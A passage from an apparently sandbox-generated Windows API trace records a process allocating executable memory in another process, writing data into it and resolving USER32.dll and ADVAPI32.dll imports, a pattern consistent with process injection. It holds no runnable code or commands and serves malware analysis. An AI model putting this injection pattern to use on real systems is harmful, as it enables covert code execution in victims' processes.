NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.294] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.294] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.295] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.295] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.295] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.295] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.295] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.295] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a170, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.295] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.296] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c70a*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c70a*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.296] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.296] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.296] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.296] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.296] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.297] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.297] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.297] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.297] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.297] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.297] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.297] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.298] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a178, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.298] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.298] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c71a*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c71a*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0241.298] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.298] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.298] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.298] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.299] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.299] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.299] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.299] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.299] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.299] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.300] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.300] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.300] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a180, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.300] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.300] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c726*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c726*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.300] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.300] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.300] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.301] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.301] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.301] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.301] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.301] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.301] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.301] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.301] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.301] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.302] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a188, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.302] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.302] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52caba*, NumberOfBytesToWrite=0xe, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52caba*, NumberOfBytesWritten=0x28df88*=0xe) returned 0x0 [0241.302] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.302] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.302] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.302] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.302] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.303] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.303] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.303] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.303] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.303] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.303] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001e, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.303] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.303] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a190, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.303] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c812, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="USER32.dll") returned 11 [0241.303] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.303] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0241.304] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.304] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.304] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.304] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.304] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.304] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.304] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.316] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.316] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.317] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.317] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.317] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.317] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.317] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c7fc*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c7fc*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0241.317] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.317] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.317] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.318] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.318] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.318] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.318] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.318] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.318] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.318] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.318] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.318] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.319] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.319] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.319] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c808*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c808*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0241.319] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.319] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.319] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.319] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.320] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.320] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.320] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.320] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.320] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.320] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.320] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.320] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.320] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.320] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c872, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="ADVAPI32.dll") returned 13 [0241.320] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.321] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0241.321] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.321] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.321] NtAllocateVirtualMemory (in: 